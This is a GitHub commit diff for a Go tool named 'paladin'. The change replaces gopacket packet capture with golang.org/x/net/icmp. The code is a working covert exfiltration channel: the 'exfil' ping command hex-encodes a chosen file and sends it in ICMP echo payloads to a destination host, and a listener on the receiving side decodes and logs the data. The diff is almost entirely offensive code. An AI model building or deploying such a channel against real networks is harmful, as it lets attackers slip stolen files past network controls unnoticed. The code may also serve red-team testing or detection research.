moving away from gopacket and using icmp.ParseMessage instead

Zeerg · Aug 30, 2020 · cdf59ab · cdf59ab
1 parent 89f6690
commit cdf59ab
Show file tree

Hide file tree

Showing 4 changed files with 39 additions and 45 deletions.
diff --git a/cmd/common.go b/cmd/common.go
@@ -3,9 +3,9 @@ package cmd
 import (
     "io/ioutil"
     "encoding/hex"
-    
+
     "github.com/Zeerg/paladin/log"
-    
+
 )
 
 func check(e error) {
@@ -22,4 +22,11 @@ func hexEncode(fileName string) []byte {
 	dstEnc := make([]byte, hex.EncodedLen(len(dat)))
 	hex.Encode(dstEnc, dat)
 	return dstEnc
-}
+}
+func hexDecode(bytesObject []byte) string {
+    dst := make([]byte, hex.DecodedLen(len(bytesObject)))
+    n, err := hex.Decode(dst, bytesObject)
+    check(err)
+    encodedMessage := string(dst[:n])
+    return encodedMessage
+}
diff --git a/cmd/exfil.go b/cmd/exfil.go
@@ -8,7 +8,6 @@ import (
 var (
 	dhost string
 	exfilFileName string
-	device string
 	runTime int32
 	outFile string
 	dnsPort int
@@ -59,7 +58,7 @@ var exfilPingReceive = &cobra.Command{
 	Short: "Packet capture ping requests and reassemble files",
 	Long: `Packet capture ping requests and reassemble file`,
 	Run: func(cmd *cobra.Command, args []string) {
-		pingReassemble(outFile, device, runTime)
+		pingListen(outFile, ipListen, runTime)
 	},
 }
 
@@ -79,7 +78,7 @@ func init() {
 	exfilPing.Flags().StringVarP(&exfilFileName, "file", "f", "", "The name of the file to send over ping")
 
 	//Ping Reassemble flags
-	exfilPingReceive.Flags().StringVarP(&device, "device", "i", "", "The Device to listen on")
+	exfilPingReceive.Flags().StringVarP(&ipListen, "ip", "i", "0.0.0.0", "The ip to listen on")
 	exfilPingReceive.Flags().Int32VarP(&runTime, "runTime", "r", 1024, "How long to run the ping listener")
 	exfilPingReceive.Flags().StringVarP(&outFile, "outfile", "o", "out.text", "The destination filename")
 

diff --git a/cmd/ping_client.go b/cmd/ping_client.go
@@ -11,7 +11,7 @@ import (
 
 
 )
-// executePing is a basic ping implementation 
+// executePing is a basic ping implementation
 func executePing(targetIP string, fileBytes []byte) {
 	c, err := icmp.ListenPacket("ip4:icmp", "0.0.0.0")
     check(err)
@@ -33,6 +33,7 @@ func executePing(targetIP string, fileBytes []byte) {
 
 // pingExfil Sends a file over ping to a destination server
 func pingExfil(destination, fileName string) {
-	fileAsHex := hexEncode(fileName)
+    fileAsHex := hexEncode(fileName)
+    log.Println(fileAsHex)
 	executePing(destination, fileAsHex)
-}
+}
diff --git a/cmd/ping_server.go b/cmd/ping_server.go
@@ -1,48 +1,35 @@
 package cmd
 
 import (
-	"fmt"
-	"time"
-    "encoding/hex"
-    "os"
-
-    "github.com/google/gopacket"
-	"github.com/google/gopacket/pcap"
-
+    "golang.org/x/net/icmp"
+    "reflect"
+    "log"
+    "bytes"
 )
+
 var (
-    captureDevice       string = "eth0"
+    ipListen       string = "0.0.0.0"
     captureTime int32 = 1024
     promiscuous  bool   = false
     err          error
-    timeout      time.Duration = 1 * time.Second
-	handle       *pcap.Handle
-	filter 		 string = "icmp"
 )
 
-// pingReassemble takes the payload and reassembles it. 
-func pingReassemble(outFile, captureDevice string, captureTime int32) {
-
-    // Open device
-    handle, err = pcap.OpenLive(captureDevice, captureTime, promiscuous, timeout)
-    check(err)
-	defer handle.Close()
-
-    // Set filter
-    err = handle.SetBPFFilter(filter)
+// pingListen waits for the ping at the address
+func pingListen(outFile, ipListen string, captureTime int32) {
+    // Listen for ping
+    pkt, err := icmp.ListenPacket("ip4:1", ipListen)
     check(err)
-    packetSource := gopacket.NewPacketSource(handle, handle.LinkType())
-    for packet := range packetSource.Packets() {
-		appLayer := packet.ApplicationLayer();
-		payload, err := hex.DecodeString(string(appLayer.Payload()))
-		check(err)
-        fmt.Println(string(payload))
-        f, err := os.OpenFile(outFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
+    // Wait to get request
+	for {
+		buf := make([]byte, 1024)
+		_, addr, _ := pkt.ReadFrom(buf)
+		clientAddr := addr
+		m, err := icmp.ParseMessage(1,buf)
         check(err)
-        defer f.Close()
-        if _, err := f.WriteString(string(payload)); err != nil {
-	        check(err)
-        }
-    }
-
-}
+        datBody := reflect.ValueOf(m.Body).Elem().FieldByName("Data").Bytes()
+        b := bytes.Trim(datBody, "\x00")
+        decodedText := hexDecode(b)
+        log.Println(decodedText)
+        log.Println(clientAddr)
+	}
+}